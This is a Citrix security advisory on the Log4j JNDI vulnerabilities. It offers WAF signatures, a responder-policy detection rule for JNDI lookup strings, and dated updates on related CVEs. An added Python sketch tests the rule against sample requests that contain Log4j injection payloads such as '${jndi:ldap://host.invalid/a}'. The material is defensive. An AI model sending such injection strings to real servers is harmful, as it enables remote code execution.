A zero-day exploit affecting Apache Log4j versions 2.0-beta9 through 2.14.1 was made public on December 9, 2021. In these versions, the JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. As a result, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

Citrix recommends that customers follow Apache’s recommendations. In addition, Citrix Web App Firewall (WAF) customers should consider the following recommendations to improve the security of their applications from this vulnerability.

The Citrix research team has released updated Citrix WAF signatures designed to mitigate, in part, the CVE-2021-44228 vulnerability. If you are using any of these Log4j versions (from 2.0-beta9 to 2.14.1), Citrix strongly recommends that you download signatures version 73 and apply them to your Citrix WAF deployments as an additional layer of protection for your applications. The signatures are compatible with the following software versions of Citrix Application Delivery Controller (ADC): 11.1, 12.0, 12.1, 13.0 and 13.1. Please note that version 12.0 is End of Life. Learn more about the release life cycle at https://www.citrix.com/support/product-lifecycle/product-matrix.html.

If you are already using Citrix WAF signatures with the auto-update feature enabled, follow these steps after verifying that the signature version is at least version 73.

  1. Search your signatures for CVE-2021-44228 LogString.
  2. Select the results.
  3. Choose “Enable Rules” and click OK.

Citrix ADC Standard and Advanced edition customers, as well as Premium edition customers who do not have WAF signatures enabled, can use responder policies for protection as shown below. Please bind the responder policy to the appropriate bind point (vserver or global).

add policy patset patset_cve_2021_44228
bind policy patset patset_cve_2021_44228 ldap
bind policy patset patset_cve_2021_44228 http
bind policy patset patset_cve_2021_44228 https
bind policy patset patset_cve_2021_44228 ldaps
bind policy patset patset_cve_2021_44228 rmi
bind policy patset patset_cve_2021_44228 dns
add responder policy mitigate_cve_2021_44228 q^HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228")^ DROP

Citrix recommends that Citrix WAF customers use the latest signature version, enable signature auto-update, and subscribe to signature alert notifications. Citrix will continue to monitor this dynamic situation and provide updates as new mitigations become available.


Update 1 (December 15, 2021)

If the availability of any of your applications is inadvertently impacted by false positives resulting from the above-mentioned mitigation policies, Citrix recommends the following modifications to the policy. Please note that any endpoint covered by the exception_list remains exposed to the risks from CVE-2021-44228.

  1. Modifications to Responder Policy

add policy patset exception_list
# (Example: bind policy patset exception_list "/exception_url")

set responder policy mitigate_cve_2021_44228 -rule q^HTTP.REQ.URL.CONTAINS_ANY("exception_list").NOT && (HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228"))^

  2. Modifications to WAF Policy

add policy patset exception_list
# (Example: bind policy patset exception_list "/exception_url")

Prepend the rule of the existing WAF policy with HTTP.REQ.URL.CONTAINS_ANY("exception_list").NOT
# (Example: set appfw policy my_WAF_policy -rule q^HTTP.REQ.URL.CONTAINS_ANY("exception_list").NOT && <existing rule>^)
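
An added Python sketch (not Citrix code) that approximates the two checks in the responder rule above, plus the Update 1 exception list, over constructed requests. It assumes AFTER_STR and BEFORE_STR yield empty text when the search string is absent, and it uses urllib percent-decoding in place of the ADC's URLENCODED text mode. The last sample shows ordinary traffic that mentions "jndi" being dropped, which is the false-positive case the exception list addresses.

```python
from urllib.parse import unquote

# Values bound to patset_cve_2021_44228 and the STRIP_CHARS set, as shown on the page.
PATSET = ("ldap", "http", "https", "ldaps", "rmi", "dns")
STRIP = set("${: }/+")

def after_str(text, needle):
    # Text after the first occurrence; empty when absent (assumed behaviour).
    i = text.find(needle)
    return text[i + len(needle):] if i >= 0 else ""

def before_str(text, needle):
    # Text before the first occurrence; empty when absent (assumed behaviour).
    i = text.find(needle)
    return text[:i] if i >= 0 else ""

def nested_lookup(text):
    # Clause 1: a "${" appears inside the first "${ ... }" span after URL decoding.
    return "${" in before_str(after_str(unquote(text), "${"), "}")

def jndi_scheme(text):
    # Clause 2: decode, ignore case, strip "${: }/+", then look for any
    # pattern-set entry anywhere after the first "jndi".
    stripped = "".join(c for c in unquote(text).lower() if c not in STRIP)
    return any(p in after_str(stripped, "jndi") for p in PATSET)

def would_drop(url, header, body=b"", exception_list=()):
    # Update 1: URLs containing an exception_list entry skip the checks entirely.
    if any(e in url for e in exception_list):
        return False
    texts = (header, body[:8192].decode("latin-1"))  # mirrors HTTP.REQ.BODY(8192)
    return any(nested_lookup(t) or jndi_scheme(t) for t in texts)

# Constructed sample requests: (url, header text, body).
SAMPLES = {
    "plain": ("/app", "User-Agent: ${jndi:ldap://host.invalid/a}\r\n", b""),
    "encoded_body": ("/app", "Accept: */*\r\n", b"q=%24%7Bjndi%3Adns%3A%2F%2Fhost.invalid%7D"),
    "nested": ("/app", "X-Test: ${${x}y}\r\n", b""),
    "benign": ("/index.html", "Accept: */*\r\n", b""),
    "false_positive": ("/docs/jndi-overview",
                       "Referer: http://wiki.invalid/docs/jndi-overview\r\nOrigin: http://wiki.invalid\r\n", b""),
}

if __name__ == "__main__":
    for name, (url, header, body) in SAMPLES.items():
        print(name, would_drop(url, header, body),
              would_drop(url, header, body, exception_list=("/docs/",)))
```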

Update 2 (December 15, 2021)

A second Log4j vulnerability, CVE-2021-45046, was reported on December 14. It is rated 3.7 out of a maximum of 10 on the CVSS rating system and affects all versions of Log4j from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0.

The Citrix recommendations for CVE-2021-44228, with WAF Signatures version 73 and Responder policies, will also mitigate the CVE-2021-45046 vulnerability.

Update 3 (December 19, 2021)

Another Log4j vulnerability was reported on December 18 (CVE-2021-45105) that affects Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3).

Citrix recommendations for CVE-2021-44228/CVE-2021-45046 with WAF Signatures version 73 and Responder policies will also mitigate the CVE-2021-45105 vulnerability exploits.

Update 4 (December 24, 2021)

The Cybersecurity and Infrastructure Security Agency (CISA) has announced the release of a scanner for identifying web services impacted by two Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046.

The Citrix recommendations for CVE-2021-44228/CVE-2021-45046/CVE-2021-45105, with WAF Signatures version 73 and Responder policies, have been validated against the above-mentioned CISA Apache Scanner to mitigate vulnerability exploits.

The current WAF signatures version 74 includes regular updates not related to Log4j vulnerabilities.

Update 5 (February 9, 2022)

Another critical Log4j vulnerability, CVE-2022-23305, with a score of 9.8 was reported on January 18th. It affects Log4j versions from 1.2 to 1.2.17.

Citrix recommends enabling SQL Injection Protection in the WAF configuration to mitigate CVE-2022-23305 vulnerability exploits. For customers on software release versions 13.0 and 13.1, Citrix recommends enabling SQL Grammar-based protection.

Please note that an ADC firmware upgrade is not required for any of the above-mentioned Log4j mitigations. However, if a new ADC build is needed for any other reason, please use one of the following latest builds: 13.1.12.51, 13.0.84.11 or 12.1.63.24. If an older build is installed after the protection with WAF signatures was created, please update the WAF signatures to the latest version and ensure that the required signatures are enabled.

Citrix will continue to update this advisory for CVE-2021-45105 as additional information becomes available.

Additional Information

Citrix WAF has a single code base across physical, virtual, bare-metal, and containers that brings consistency to your deployment model. This signature update applies to all form factors and deployment models of Citrix WAF.

To learn more about Citrix Web App Firewall, see https://docs.citrix.com/en-us/citrix-adc/current-release/application-firewall/introduction-to-citrix-web-app-firewall.html.

To learn more about Citrix Web App Firewall signatures, check out our alert articles and bot signature articles.

To learn about the signature alert notification, go to https://docs.citrix.com/en-us/citrix-adc/current-release/application-firewall/signature-alerts/how-to-receive-signature-alert.html.

Patches and Mitigations

Citrix strongly recommends that customers consider the security guidance from vendors of other products that they may have deployed. Until a patch is made available, you may reduce the risk of a successful attack by applying mitigations. Mitigations should not be considered full solutions as they do not fully address the underlying issue(s).